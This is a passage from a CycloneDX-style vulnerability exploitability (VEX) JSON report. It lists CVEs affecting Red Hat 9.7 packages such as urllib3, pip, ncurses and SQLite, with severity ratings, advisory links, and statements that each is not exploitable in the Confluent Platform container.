"urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2023-45803", "ratings": [ { "source": { "name": "alma" }, "severity": "medium" }, { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "ghsa" }, "score": 4.2, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "nvd" }, "score": 4.2, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "oracle-oval" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.2, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "rocky" }, "severity": "medium" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 200 ], "description": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2023-45803" }, { "url": "https://access.redhat.com/errata/RHSA-2024:2132" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-45803" }, { "url": "https://bugzilla.redhat.com/2246840" }, { "url": "https://bugzilla.redhat.com/2257028" }, { "url": "https://bugzilla.redhat.com/2257854" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2246840" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45803" }, { "url": "https://errata.almalinux.org/9/ALSA-2024-2132.html" }, { "url": "https://errata.rockylinux.org/RLSA-2024:11238" }, { "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml" }, { "url": "https://github.com/urllib3/urllib3" }, { "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3" }, { "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9" }, { "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36" }, { "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18" }, { "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7" }, { "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4" }, { "url": "https://linux.oracle.com/cve/CVE-2023-45803.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2024-2988.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00020.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803" }, { "url": "https://ubuntu.com/security/notices/USN-6473-1" }, { "url": "https://ubuntu.com/security/notices/USN-6473-2" }, { "url": "https://ubuntu.com/security/notices/USN-7762-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2023-45803" }, { "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get" } ], "published": "2023-10-17T20:15:10+00:00", "updated": "2025-11-03T22:16:28+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" } ] }, { "id": "CVE-2023-50495", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "nvd" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "description": "NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2023-50495" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-50495" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/" }, { "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00020.html" }, { "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00029.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50495" }, { "url": "https://security.netapp.com/advisory/ntap-20240119-0008/" }, { "url": "https://ubuntu.com/security/notices/USN-6684-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2023-50495" } ], "published": "2023-12-12T15:15:07+00:00", "updated": "2025-11-04T19:16:14+00:00", "affects": [ { "ref": "pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "6.2-12.20210508.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "6.2-12.20210508.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/ncurses-base@6.2-12.20210508.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/ncurses-libs@6.2-12.20210508.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable." } }, { "id": "CVE-2023-5752", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "ghsa" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "nvd" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "source": { "name": "redhat" }, "score": 3.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" } ], "cwes": [ 77 ], "description": "When installing a package from a Mercurial VCS URL (ie \"pip install \nhg+...\") with pip prior to v23.3, the specified Mercurial revision could\n be used to inject arbitrary configuration options to the \"hg clone\" \ncall (ie \"--config\"). Controlling the Mercurial configuration can modify\n how and which repository is installed. This vulnerability does not \naffect users who aren't installing from Mercurial.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2023-5752" }, { "url": "https://access.redhat.com/security/cve/CVE-2023-5752" }, { "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2023-228.yaml" }, { "url": "https://github.com/pypa/pip" }, { "url": "https://github.com/pypa/pip/commit/389cb799d0da9a840749fcd14878928467ed49b4" }, { "url": "https://github.com/pypa/pip/pull/12306" }, { "url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00028.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/622OZXWG72ISQPLM5Y57YCVIMWHD4C3U" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/622OZXWG72ISQPLM5Y57YCVIMWHD4C3U/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/65UKKF5LBHEFDCUSPBHUN4IHYX7SRMHH" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/65UKKF5LBHEFDCUSPBHUN4IHYX7SRMHH/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FXUVMJM25PUAZRQZBF54OFVKTY3MINPW" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FXUVMJM25PUAZRQZBF54OFVKTY3MINPW/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KFC2SPFG5FLCZBYY2K3T5MFW2D22NG6E" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KFC2SPFG5FLCZBYY2K3T5MFW2D22NG6E/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YBSB3SUPQ3VIFYUMHPO3MEQI4BJAXKCZ" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YBSB3SUPQ3VIFYUMHPO3MEQI4BJAXKCZ/" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/F4PL35U6X4VVHZ5ILJU3PWUWN7H7LZXL" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/F4PL35U6X4VVHZ5ILJU3PWUWN7H7LZXL/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5752" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2023-5752" } ], "published": "2023-10-25T18:17:44+00:00", "updated": "2025-11-03T18:15:41+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": "Mercurial is not available in RHEL 8 and 9, so the vulnerability cannot be exploited. Without mercurial installed (the hg command), pip cannot clone and install from hg+http[s] URLs." } }, { "id": "CVE-2024-0232", "ratings": [ { "source": { "name": "bitnami" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 4.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "cwes": [ 416 ], "description": "A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-0232" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-0232" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243754" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0232" }, { "url": "https://security.netapp.com/advisory/ntap-20240315-0007/" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-0232" } ], "published": "2024-01-16T14:15:48+00:00", "updated": "2024-11-21T08:46:06+00:00", "affects": [ { "ref": "pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.34.1-9.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable." } }, { "id": "CVE-2024-10524", "ratings": [ { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L" } ], "cwes": [ 918 ], "description": "Applications that use Wget to access a remote resource using shorthand URLs and pass arbitrary user credentials in the URL are 